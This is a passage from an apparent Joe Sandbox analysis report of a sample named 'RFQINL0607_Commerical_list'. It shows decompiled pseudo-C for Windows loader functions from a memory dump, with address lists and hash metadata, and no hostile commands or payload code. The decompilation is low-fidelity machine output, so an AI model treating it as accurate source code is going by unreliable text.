				_v72 = L"LdrpResMapFile Exit";
				_t78 = L33363C40();
				_t126 = 0x7ffe0385;
				if(_t78 == 0) {
					_t79 = 0x7ffe0385;
				} else {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				_t151 = 0x7ffe0384;
				if(( *_t79 & 0x00000001) != 0) {
					if(L33363C40() == 0) {
						_t119 = 0x7ffe0384;
					} else {
						_t119 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					L333DFC01( &_v84,  *_t119 & 0x000000ff);
				}
				if(_t155 == 0) {
					L48:
					_t156 = 0xc000000d;
					L14:
					if(L33363C40() != 0) {
						_t126 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t126 & 0x00000001) != 0) {
						if(L33363C40() != 0) {
							_t151 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						L333DFC01( &_v76,  *_t151 & 0x000000ff);
					}
					_t81 = _t156;
					L21:
					return _t81;
				}
				_t144 = _v100;
				if(_t144 == 0) {
					goto L48;
				}
				_t134 = _a4;
				_t166 = _t134;
				if(_t134 == 0) {
					goto L48;
				}
				_t129 = _a8;
				 *_t144 =  *_t144 & 0x00000000;
				_push(_t129 | 0x00200000);
				_push(_t134);
				_push(_t144);
				_push(_t155);
				if(E333589C0(_t129, _t151, _t155, _t166) < 0) {
					__eflags = _t129 & 0x00000400;
					if((_t129 & 0x00000400) == 0) {
						__eflags = _t129 & 0x00000800;
						if((_t129 & 0x00000800) == 0) {
							_t156 = 0xc000000d;
							L13:
							_t126 = 0x7ffe0385;
							goto L14;
						}
						_v132 = _t155;
						L37:
						__eflags = _t129 & 0x00020000;
						if((_t129 & 0x00020000) == 0) {
							L42:
							_push(_t155);
							_push(0x8000000);
							_push(2);
							_push(0);
							_push(0);
							_push(0xf0005);
							_push( &_v124);
							_t90 = E33392E50();
							_t130 =  !_t129;
							_t156 = _t90;
							__eflags = _t130 & 0x00000800;
							if((_t130 & 0x00000800) != 0) {
								_push(_v132);
								E33392A80();
							}
							__eflags = _t156;
							if(_t156 < 0) {
								goto L13;
							} else {
								_push(2);
								_push(0);
								_push("true");
								_push( &_v112);
								_v84 = 0;
								_push( &_v84);
								_push(0);
								_push(0);
								_v80 = 0;
								_push( &_v120);
								_push(0xffffffff);
								_push(_v124);
								_v112 = 0;
								_v120 = 0;
								_t94 = E33392C30();
								_push(_v164);
								_t156 = _t94;
								E33392A80();
								_t126 = 0x7ffe0385;
								__eflags = _t156;
								if(_t156 >= 0) {
									 *_v116 = _v120 | 0x00000001;
									 *_a4 = _v112;
								}
								goto L14;
							}
						}
						_t81 = E333E314A(_t155,  &_v76);
						__eflags = _t81;
						if(_t81 < 0) {
							goto L21;
						}
						__eflags = _v76 -  *_a4;
						if(_v76 <=  *_a4) {
							_t155 = _v132;
							goto L42;
						}
						_t156 = 0xc000001f;
						goto L13;
					}
					_t103 = L33371C10(_t155,  &_v108, 0,  &_v60);
					__eflags = _t103;
					if(_t103 != 0) {
						_t104 = _v60;
						_v128 = _v104;
						__eflags = _t104;
						if(_t104 == 0) {
							_t139 = 0;
							__eflags = 0;
						} else {
							_t139 = _v52;
							_v108 = _t104;
							_t104 = _v56;
							_v104 = _t104;
						}
						_v44 = 0x18;
						_v32 = 0x40;
						asm("sbb eax, eax");
						_v40 = _t104 & _t139;
						_v36 =  &_v108;
						_push(0);
						_push(0);
						_push(0);
						_push("true");
						_push(5);
						_push(0);
						_push(0);
						_v28 = 0;
						_v24 = 0;
						_push( &_v68);
						_push( &_v44);
						_push(0x80100080);
						_push( &_v132);
						_t111 = E33392F00();
						__eflags = _v172;
						_t156 = _t111;
						if(_v172 != 0) {
							_t112 = _v48;
							__eflags = _t112;
							if(_t112 != 0) {
								__eflags = _t139 | 0xffffffff;
								asm("lock xadd [eax], ecx");
								if((_t139 | 0xffffffff) == 0) {
									_push( *((intOrPtr*)(_t112 + 4)));
									E33392A80();
									E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v52);
								}
							}
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v128);
						}
						__eflags = _t156;
						if(_t156 < 0) {
							goto L13;
						} else {
							_t155 = _v132;
							goto L37;
						}
					}
					_t156 = 0xc00b0001;
					goto L13;
				}
				_t156 = 0xc000020a;
				goto L13;
			}

























































                                                                                                                                                                                  0x333e328e
                                                                                                                                                                                  0x333e3290
                                                                                                                                                                                  0x333e3294
                                                                                                                                                                                  0x333e3297
                                                                                                                                                                                  0x333e329a
                                                                                                                                                                                  0x333e329f
                                                                                                                                                                                  0x333e32a0
                                                                                                                                                                                  0x333e32a5
                                                                                                                                                                                  0x333e32ad
                                                                                                                                                                                  0x333e32b2
                                                                                                                                                                                  0x333e32b7
                                                                                                                                                                                  0x333e32bf
                                                                                                                                                                                  0x333e32c4
                                                                                                                                                                                  0x333e32cb
                                                                                                                                                                                  0x333e32dd
                                                                                                                                                                                  0x333e32cd
                                                                                                                                                                                  0x333e32d6
                                                                                                                                                                                  0x333e32d6
                                                                                                                                                                                  0x333e32e2
                                                                                                                                                                                  0x333e32e7
                                                                                                                                                                                  0x333e32f0
                                                                                                                                                                                  0x333e3302
                                                                                                                                                                                  0x333e32f2
                                                                                                                                                                                  0x333e32fb
                                                                                                                                                                                  0x333e32fb
                                                                                                                                                                                  0x333e330b
                                                                                                                                                                                  0x333e330b
                                                                                                                                                                                  0x333e3312
                                                                                                                                                                                  0x333e3588
                                                                                                                                                                                  0x333e3588
                                                                                                                                                                                  0x333e3353
                                                                                                                                                                                  0x333e335a
                                                                                                                                                                                  0x333e3365
                                                                                                                                                                                  0x333e3365
                                                                                                                                                                                  0x333e336e
                                                                                                                                                                                  0x333e3377
                                                                                                                                                                                  0x333e3382
                                                                                                                                                                                  0x333e3382
                                                                                                                                                                                  0x333e338f
                                                                                                                                                                                  0x333e338f
                                                                                                                                                                                  0x333e3394
                                                                                                                                                                                  0x333e3396
                                                                                                                                                                                  0x333e339c
                                                                                                                                                                                  0x333e339c
                                                                                                                                                                                  0x333e3318
                                                                                                                                                                                  0x333e331e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3324
                                                                                                                                                                                  0x333e3327
                                                                                                                                                                                  0x333e3329
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e332f
                                                                                                                                                                                  0x333e3334
                                                                                                                                                                                  0x333e333c
                                                                                                                                                                                  0x333e333d
                                                                                                                                                                                  0x333e333e
                                                                                                                                                                                  0x333e333f
                                                                                                                                                                                  0x333e3347
                                                                                                                                                                                  0x333e339f
                                                                                                                                                                                  0x333e33a5
                                                                                                                                                                                  0x333e349c
                                                                                                                                                                                  0x333e34a2
                                                                                                                                                                                  0x333e357e
                                                                                                                                                                                  0x333e334e
                                                                                                                                                                                  0x333e334e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e334e
                                                                                                                                                                                  0x333e34a8
                                                                                                                                                                                  0x333e34ac
                                                                                                                                                                                  0x333e34ac
                                                                                                                                                                                  0x333e34b2
                                                                                                                                                                                  0x333e34e0
                                                                                                                                                                                  0x333e34e0
                                                                                                                                                                                  0x333e34e1
                                                                                                                                                                                  0x333e34e6
                                                                                                                                                                                  0x333e34e8
                                                                                                                                                                                  0x333e34ea
                                                                                                                                                                                  0x333e34ec
                                                                                                                                                                                  0x333e34f5
                                                                                                                                                                                  0x333e34f6
                                                                                                                                                                                  0x333e34fb
                                                                                                                                                                                  0x333e34fd
                                                                                                                                                                                  0x333e34ff
                                                                                                                                                                                  0x333e3505
                                                                                                                                                                                  0x333e3507
                                                                                                                                                                                  0x333e350b
                                                                                                                                                                                  0x333e350b
                                                                                                                                                                                  0x333e3510
                                                                                                                                                                                  0x333e3512
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3518
                                                                                                                                                                                  0x333e3518
                                                                                                                                                                                  0x333e3520
                                                                                                                                                                                  0x333e3521
                                                                                                                                                                                  0x333e3523
                                                                                                                                                                                  0x333e3528
                                                                                                                                                                                  0x333e352c
                                                                                                                                                                                  0x333e352d
                                                                                                                                                                                  0x333e352e
                                                                                                                                                                                  0x333e3533
                                                                                                                                                                                  0x333e3537
                                                                                                                                                                                  0x333e3538
                                                                                                                                                                                  0x333e353a
                                                                                                                                                                                  0x333e353e
                                                                                                                                                                                  0x333e3542
                                                                                                                                                                                  0x333e3546
                                                                                                                                                                                  0x333e354b
                                                                                                                                                                                  0x333e354f
                                                                                                                                                                                  0x333e3551
                                                                                                                                                                                  0x333e3556
                                                                                                                                                                                  0x333e355b
                                                                                                                                                                                  0x333e355d
                                                                                                                                                                                  0x333e3571
                                                                                                                                                                                  0x333e3577
                                                                                                                                                                                  0x333e3577
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e355d
                                                                                                                                                                                  0x333e3512
                                                                                                                                                                                  0x333e34ba
                                                                                                                                                                                  0x333e34bf
                                                                                                                                                                                  0x333e34c1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e34ce
                                                                                                                                                                                  0x333e34d0
                                                                                                                                                                                  0x333e34dc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e34dc
                                                                                                                                                                                  0x333e34d2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e34d2
                                                                                                                                                                                  0x333e33b8
                                                                                                                                                                                  0x333e33bd
                                                                                                                                                                                  0x333e33bf
                                                                                                                                                                                  0x333e33c8
                                                                                                                                                                                  0x333e33d0
                                                                                                                                                                                  0x333e33d4
                                                                                                                                                                                  0x333e33d7
                                                                                                                                                                                  0x333e33eb
                                                                                                                                                                                  0x333e33eb
                                                                                                                                                                                  0x333e33d9
                                                                                                                                                                                  0x333e33d9
                                                                                                                                                                                  0x333e33dd
                                                                                                                                                                                  0x333e33e1
                                                                                                                                                                                  0x333e33e5
                                                                                                                                                                                  0x333e33e5
                                                                                                                                                                                  0x333e33ef
                                                                                                                                                                                  0x333e33f7
                                                                                                                                                                                  0x333e33ff
                                                                                                                                                                                  0x333e3403
                                                                                                                                                                                  0x333e340b
                                                                                                                                                                                  0x333e3411
                                                                                                                                                                                  0x333e3412
                                                                                                                                                                                  0x333e3413
                                                                                                                                                                                  0x333e3414
                                                                                                                                                                                  0x333e3416
                                                                                                                                                                                  0x333e3418
                                                                                                                                                                                  0x333e3419
                                                                                                                                                                                  0x333e341a
                                                                                                                                                                                  0x333e3421
                                                                                                                                                                                  0x333e342c
                                                                                                                                                                                  0x333e3434
                                                                                                                                                                                  0x333e3435
                                                                                                                                                                                  0x333e343e
                                                                                                                                                                                  0x333e343f
                                                                                                                                                                                  0x333e3444
                                                                                                                                                                                  0x333e3449
                                                                                                                                                                                  0x333e344b
                                                                                                                                                                                  0x333e344d
                                                                                                                                                                                  0x333e3451
                                                                                                                                                                                  0x333e3453
                                                                                                                                                                                  0x333e3455
                                                                                                                                                                                  0x333e3458
                                                                                                                                                                                  0x333e345c
                                                                                                                                                                                  0x333e345e
                                                                                                                                                                                  0x333e3461
                                                                                                                                                                                  0x333e3475
                                                                                                                                                                                  0x333e3475
                                                                                                                                                                                  0x333e345c
                                                                                                                                                                                  0x333e3489
                                                                                                                                                                                  0x333e3489
                                                                                                                                                                                  0x333e348e
                                                                                                                                                                                  0x333e3490
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3496
                                                                                                                                                                                  0x333e3496
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e3496
                                                                                                                                                                                  0x333e3490
                                                                                                                                                                                  0x333e33c1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333e33c1
                                                                                                                                                                                  0x333e3349
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}33
                                                                                                                                                                                  • API String ID: 0-3817470992
                                                                                                                                                                                  • Opcode ID: 7f154250ac9d24b8d4a7b3ff539a7180d1f9512bfc4f3abaac93419964e78337
                                                                                                                                                                                  • Instruction ID: 0c56bc856939e4b34f45d56ccafd24800f8960bf794fd25afc0f2f26ffd8abc8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f154250ac9d24b8d4a7b3ff539a7180d1f9512bfc4f3abaac93419964e78337
                                                                                                                                                                                  • Instruction Fuzzy Hash: F5817C76A49350AFE711CF14C880F6AB7E8EF84764F48996DF990DB290DB74D9008B62
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3335B360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                                  			E3335B360(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				short _t85;
				short _t86;
				intOrPtr* _t88;
				signed char* _t89;
				void* _t90;
				signed char* _t91;
				signed int _t93;
				signed int _t95;
				void* _t97;
				intOrPtr* _t99;
				signed int _t105;
				signed short _t109;
				void* _t114;
				signed char _t117;
				signed char _t118;
				signed int _t124;
				short _t127;
				signed int _t131;
				signed char* _t132;
				signed int _t135;
				intOrPtr _t137;
				signed short _t139;
				signed int _t143;
				intOrPtr _t148;
				signed int _t160;
				intOrPtr _t169;
				void* _t171;
				void* _t173;
				signed char _t186;

				_push(0x12c);
				_push(0x3342bf88);
				E333A7BE4(__ebx, __edi, __esi);
				 *((char*)(_t173 - 0x1d)) = 1;
				 *(_t173 - 0x24) = 1;
				_t127 = 0x42;
				 *((short*)(_t173 - 0x44)) = _t127;
				_t85 = 0x44;
				 *((short*)(_t173 - 0x42)) = _t85;
				 *(_t173 - 0x40) = L"LdrpResGetResourceDirectory Enter";
				_t86 = 0x40;
				 *((short*)(_t173 - 0x4c)) = _t86;
				 *((short*)(_t173 - 0x4a)) = _t127;
				 *(_t173 - 0x48) = L"LdrpResGetResourceDirectory Exit";
				_t88 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t88 != 0) {
					if( *_t88 == 0) {
						goto L1;
					}
					_t89 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					L2:
					if(( *_t89 & 0x00000001) != 0) {
						_t90 = L33363C40();
						_t165 = 0x7ffe0384;
						if(_t90 == 0) {
							_t91 = 0x7ffe0384;
						} else {
							_t91 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						L333DFC01(_t173 - 0x44,  *_t91 & 0x000000ff);
					} else {
						_t165 = 0x7ffe0384;
					}
					_t124 =  *(_t173 + 8);
					if(_t124 == 0 ||  *((intOrPtr*)(_t173 + 0x14)) == 0 ||  *((intOrPtr*)(_t173 + 0x18)) == 0) {
						_t93 = 0xc000000d;
						goto L31;
					} else {
						if((_t124 & 0x00000003) != 0) {
							_t117 = _t124 & 0x00000001;
							_t124 = _t124 & 0xfffffffc;
							_t118 = _t117 ^ 0x00000001;
							_t186 = _t118;
							 *(_t173 - 0x24) = _t118;
						}
						 *(_t173 + 0x10) =  *(_t173 + 0x10) & 0x00001000;
						_push(_t173 - 0x28);
						_push(0);
						_push( *((intOrPtr*)(_t173 + 0xc)));
						_push(_t124);
						_t95 = 0;
						_push(_t95 & 0xffffff00 | _t186 == 0x00000000);
						_t93 = E3335E580();
						if(_t93 < 0) {
							L31:
							 *[fs:0x0] =  *((intOrPtr*)(_t173 - 0x10));
							return _t93;
						} else {
							 *(_t173 - 4) =  *(_t173 - 4) & 0x00000000;
							_t146 =  *((intOrPtr*)(_t173 - 0x28));
							_t97 =  *((intOrPtr*)(_t173 - 0x28)) + 0x18;
							_t131 =  *_t97 & 0x0000ffff;
							if(_t131 != 0x10b) {
								if(_t131 != 0x20b) {
									 *(_t173 - 0x1c) = 0xc000007b;
									 *(_t173 - 4) = 0xfffffffe;
									L28:
									_t132 = 0x7ffe0385;
									_t99 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
									if(_t99 != 0) {
										if( *_t99 != 0) {
											_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
										}
									}
									if(( *_t132 & 0x00000001) != 0) {
										if(L33363C40() != 0) {
											_t165 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
										}
										L333DFC01(_t173 - 0x4c,  *_t165 & 0x000000ff);
									}
									_t93 =  *(_t173 - 0x1c);
									goto L31;
								}
								_t135 = 0x3c;
								memcpy(_t173 - 0x13c, _t97, _t135 << 2);
								_t137 = 0;
								L12:
								_t105 =  *(_t173 - 0xe0);
								if(_t137 == 0) {
									_t105 =  *(_t173 - 0xd0);
								}
								if(_t105 <= 2) {
									L36:
									 *(_t173 - 0x1c) = 0xc0000089;
									goto L37;
								} else {
									_t169 =  *((intOrPtr*)(_t173 - 0xcc));
									if(_t137 == 0) {
										_t169 =  *((intOrPtr*)(_t173 - 0xbc));
									}
									if(_t169 == 0) {
										goto L36;
									} else {
										if( *(_t173 - 0x24) == 0) {
											if(_t169 <  *((intOrPtr*)(_t173 - 0x100))) {
												goto L17;
											}
											_t160 =  *(_t173 + 0x10);
											_t114 = E333581C2(_t124,  *((intOrPtr*)(_t173 + 0xc)), _t146, 0, _t169, (_t105 & 0xffffff00 | _t160 != 0x00000000) & 0x000000ff);
											if(_t114 == 0) {
												L42:
												 *(_t173 - 0x1c) = 0xc000007b;
												L37:
												 *(_t173 - 4) = 0xfffffffe;
												L27:
												_t165 = 0x7ffe0384;
												goto L28;
											}
											if( *((intOrPtr*)(_t114 + 0x10)) == 0) {
												goto L36;
											}
											_t148 =  *((intOrPtr*)(_t114 + 0x14)) -  *((intOrPtr*)(_t114 + 0xc)) + _t169 + _t124;
											L19:
											 *((intOrPtr*)(_t173 - 0x34)) = _t148;
											 *(_t173 - 4) = 0xfffffffe;
											if(_t148 == 0) {
												 *(_t173 - 0x1c) = 0xc0000089;
												goto L27;
											}
											if(_t160 == 0) {
												L26:
												 *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x14)))) = _t148;
												 *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x18)))) =  *((intOrPtr*)(_t173 - 0x28));
												 *(_t173 - 0x1c) =  *(_t173 - 0x1c) & 0x00000000;
												goto L27;
											}
											if(_t148 <= _t124) {
												L49:
												 *(_t173 - 0x1c) = 0xc000007b;
												goto L27;
											}
											_t171 =  *((intOrPtr*)(_t173 + 0xc)) + (_t124 & 0xfffffffc);
											if(_t148 + 0x10 > _t171) {
												goto L49;
											}
											 *(_t173 - 4) = 1;
											_t109 =  *((intOrPtr*)(_t148 + 0xc));
											 *(_t173 - 0x2c) = _t109;
											_t139 =  *((intOrPtr*)(_t148 + 0xe));
											 *(_t173 - 0x30) = _t139;
											 *(_t173 - 4) = 0xfffffffe;
											if(_t109 != 0 || _t139 != 0) {
												if(_t148 + ((_t139 & 0x0000ffff) + (_t109 & 0x0000ffff)) * 8 > _t171) {
													goto L49;
												}
												goto L26;
											} else {
												 *(_t173 - 0x1c) = 0xc000008a;
												goto L27;
											}
										}
										L17:
										_t148 = _t169 + _t124;
										if(_t148 < _t124) {
											goto L42;
										}
										_t160 =  *(_t173 + 0x10);
										goto L19;
									}
								}
							}
							_t143 = 0x38;
							memcpy(_t173 - 0x13c, _t97, _t143 << 2);
							_t137 =  *((intOrPtr*)(_t173 - 0x1d));
							goto L12;
						}
					}
				}
				L1:
				_t89 = 0x7ffe0385;
				goto L2;
			}
































                                                                                                                                                                                  0x3335b360
                                                                                                                                                                                  0x3335b365
                                                                                                                                                                                  0x3335b36a
                                                                                                                                                                                  0x3335b36f
                                                                                                                                                                                  0x3335b373
                                                                                                                                                                                  0x3335b379
                                                                                                                                                                                  0x3335b37a
                                                                                                                                                                                  0x3335b380
                                                                                                                                                                                  0x3335b381
                                                                                                                                                                                  0x3335b385
                                                                                                                                                                                  0x3335b38e
                                                                                                                                                                                  0x3335b38f
                                                                                                                                                                                  0x3335b393
                                                                                                                                                                                  0x3335b397
                                                                                                                                                                                  0x3335b3a4
                                                                                                                                                                                  0x3335b3a9
                                                                                                                                                                                  0x333b353d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b354c
                                                                                                                                                                                  0x3335b3b4
                                                                                                                                                                                  0x3335b3b7
                                                                                                                                                                                  0x333b3556
                                                                                                                                                                                  0x333b355b
                                                                                                                                                                                  0x333b3562
                                                                                                                                                                                  0x333b3574
                                                                                                                                                                                  0x333b3564
                                                                                                                                                                                  0x333b356d
                                                                                                                                                                                  0x333b356d
                                                                                                                                                                                  0x333b357c
                                                                                                                                                                                  0x3335b3bd
                                                                                                                                                                                  0x3335b3bd
                                                                                                                                                                                  0x3335b3bd
                                                                                                                                                                                  0x3335b3c2
                                                                                                                                                                                  0x3335b3c7
                                                                                                                                                                                  0x333b3631
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335b3e1
                                                                                                                                                                                  0x3335b3e4
                                                                                                                                                                                  0x3335b3e8
                                                                                                                                                                                  0x3335b3eb
                                                                                                                                                                                  0x3335b3ee
                                                                                                                                                                                  0x3335b3ee
                                                                                                                                                                                  0x3335b3f0
                                                                                                                                                                                  0x3335b3f0
                                                                                                                                                                                  0x3335b3f3
                                                                                                                                                                                  0x3335b3fd
                                                                                                                                                                                  0x3335b3fe
                                                                                                                                                                                  0x3335b400
                                                                                                                                                                                  0x3335b403
                                                                                                                                                                                  0x3335b406
                                                                                                                                                                                  0x3335b40a
                                                                                                                                                                                  0x3335b40b
                                                                                                                                                                                  0x3335b412
                                                                                                                                                                                  0x3335b530
                                                                                                                                                                                  0x3335b533
                                                                                                                                                                                  0x3335b53f
                                                                                                                                                                                  0x3335b418
                                                                                                                                                                                  0x3335b418
                                                                                                                                                                                  0x3335b41c
                                                                                                                                                                                  0x3335b41f
                                                                                                                                                                                  0x3335b422
                                                                                                                                                                                  0x3335b42d
                                                                                                                                                                                  0x3335b59c
                                                                                                                                                                                  0x333b35bd
                                                                                                                                                                                  0x333b35c4
                                                                                                                                                                                  0x3335b50e
                                                                                                                                                                                  0x3335b50e
                                                                                                                                                                                  0x3335b519
                                                                                                                                                                                  0x3335b51e
                                                                                                                                                                                  0x333b35ef
                                                                                                                                                                                  0x333b35fe
                                                                                                                                                                                  0x333b35fe
                                                                                                                                                                                  0x333b35ef
                                                                                                                                                                                  0x3335b527
                                                                                                                                                                                  0x333b3610
                                                                                                                                                                                  0x333b361b
                                                                                                                                                                                  0x333b361b
                                                                                                                                                                                  0x333b3627
                                                                                                                                                                                  0x333b3627
                                                                                                                                                                                  0x3335b52d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335b52d
                                                                                                                                                                                  0x3335b5a4
                                                                                                                                                                                  0x3335b5ad
                                                                                                                                                                                  0x3335b5af
                                                                                                                                                                                  0x3335b443
                                                                                                                                                                                  0x3335b445
                                                                                                                                                                                  0x3335b44b
                                                                                                                                                                                  0x3335b5b6
                                                                                                                                                                                  0x3335b5b6
                                                                                                                                                                                  0x3335b454
                                                                                                                                                                                  0x3335b581
                                                                                                                                                                                  0x3335b581
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335b45a
                                                                                                                                                                                  0x3335b45c
                                                                                                                                                                                  0x3335b462
                                                                                                                                                                                  0x3335b5c1
                                                                                                                                                                                  0x3335b5c1
                                                                                                                                                                                  0x3335b46a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335b470
                                                                                                                                                                                  0x3335b474
                                                                                                                                                                                  0x3335b548
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335b54e
                                                                                                                                                                                  0x3335b563
                                                                                                                                                                                  0x3335b56a
                                                                                                                                                                                  0x3335b5cc
                                                                                                                                                                                  0x3335b5cc
                                                                                                                                                                                  0x3335b588
                                                                                                                                                                                  0x3335b588
                                                                                                                                                                                  0x3335b509
                                                                                                                                                                                  0x3335b509
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335b509
                                                                                                                                                                                  0x3335b570
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335b57a
                                                                                                                                                                                  0x3335b488
                                                                                                                                                                                  0x3335b488
                                                                                                                                                                                  0x3335b48b
                                                                                                                                                                                  0x3335b494
                                                                                                                                                                                  0x333b35b1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b35b1
                                                                                                                                                                                  0x3335b49c
                                                                                                                                                                                  0x3335b4f8
                                                                                                                                                                                  0x3335b4fb
                                                                                                                                                                                  0x3335b503
                                                                                                                                                                                  0x3335b505
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335b505
                                                                                                                                                                                  0x3335b4a0
                                                                                                                                                                                  0x333b3586
                                                                                                                                                                                  0x333b3586
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b3586
                                                                                                                                                                                  0x3335b4ac
                                                                                                                                                                                  0x3335b4b3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335b4b9
                                                                                                                                                                                  0x3335b4c0
                                                                                                                                                                                  0x3335b4c4
                                                                                                                                                                                  0x3335b4c8
                                                                                                                                                                                  0x3335b4cc
                                                                                                                                                                                  0x3335b4d0
                                                                                                                                                                                  0x3335b4da
                                                                                                                                                                                  0x3335b4f2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b3592
                                                                                                                                                                                  0x333b3592
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b3592
                                                                                                                                                                                  0x3335b4da
                                                                                                                                                                                  0x3335b47a
                                                                                                                                                                                  0x3335b47a
                                                                                                                                                                                  0x3335b47f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335b485
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335b485
                                                                                                                                                                                  0x3335b46a
                                                                                                                                                                                  0x3335b454
                                                                                                                                                                                  0x3335b435
                                                                                                                                                                                  0x3335b43e
                                                                                                                                                                                  0x3335b440
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335b440
                                                                                                                                                                                  0x3335b412
                                                                                                                                                                                  0x3335b3c7
                                                                                                                                                                                  0x3335b3af
                                                                                                                                                                                  0x3335b3af
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LU23$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                  • API String ID: 0-2555142525
                                                                                                                                                                                  • Opcode ID: 8aa4eab10abcb60308325f381b8e720ad2cc137d77fc1d4009cac2d8413cf6c2
                                                                                                                                                                                  • Instruction ID: 25ebb802f881675b58e2b2ff10f6f5eac27c6c8c5fd8bff81055628ca5520664
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aa4eab10abcb60308325f381b8e720ad2cc137d77fc1d4009cac2d8413cf6c2
                                                                                                                                                                                  • Instruction Fuzzy Hash: EB91CEB5A45359CFEB15CF54C880BADB7B4EF00364F28C596F850AB290D7789A80CB91
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333563CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                  			E333563CB(signed int __ecx) {
				signed int _v8;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				char _v100;
				char _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t88;
				intOrPtr _t100;
				signed int _t121;
				void* _t122;
				signed char _t126;
				void* _t128;
				void* _t131;
				void* _t133;
				signed int _t136;
				signed int _t138;

				_t123 = __ecx;
				_t138 = (_t136 & 0xfffffff8) - 0x64;
				_t83 =  *0x3344b370 ^ _t138;
				_v8 =  *0x3344b370 ^ _t138;
				_t121 = __ecx;
				if(__ecx == 0) {
					L15:
					_pop(_t128);
					_pop(_t133);
					_pop(_t122);
